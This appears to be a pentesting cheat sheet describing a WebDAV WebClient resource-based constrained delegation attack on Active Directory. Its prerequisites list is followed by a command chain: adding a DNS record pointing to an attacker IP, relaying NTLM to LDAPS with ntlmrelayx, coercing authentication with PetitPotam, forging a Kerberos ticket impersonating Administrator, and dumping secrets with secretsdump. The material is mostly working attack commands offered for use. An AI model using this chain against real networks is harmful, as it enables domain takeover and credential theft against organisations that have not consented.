WebDAV WebClient
Resource: https://www.bussink.net/rbcd-webclient-attack/
Prerequisites
Domain Controller to have LDAP signing not enforced (default value)
Domain Controller to have LDAPS channel binding not required (default value)
Normal Domain users are able to add machine accounts (default MAQ value is 10)
Normal Domain users are able to create DNS records (or Local Admin access to a device that has internal DNS to set up port forward)
Machines with WebClient enabledCheck if WebClients are enabled
nxc smb scope.txt -d '<DOMAIN-FQDN>' -u '<USERNAME>' -p '<PASSWORD>' -M webdavAdd a DNS record if DNS resolution is not active
python3 dnstool.py -u '<DOMAIN-FQDN>\<USERNAME>' -p '<PASSWORD>' -a add -r <NS-RECORD-NAME> -d <ATTACKER-IP> <DC-IP>Set up NTLM relay
sudo impacket-ntlmrelayx -t ldaps://<DC-IP> --http-port 8080 --delegate-access Coerce authentication
python3 PetitPotam.py -d '<DOMAIN-FQDN>' -u '<USERNAME>' -p '<PASSWORD>' '<DNS-RECORD>@8080/a' <WEBCLIENT-ENABLED-HOST-IP>Create Kerberos ticket
impacket-getST -spn CIFS/<COMPUTER-NAME>.<DOMAIN-FQDN> <DOMAIN-FQDN>/<COMPUTER-USERNAME>\$ -dc-ip <DC-IP> -impersonate AdministratorDump secrets
export KRB5CCNAME=Administrator.ccache
impacket-secretsdump -k <COMPUTER-NAME>.<DOMAIN-FQDN>Last updated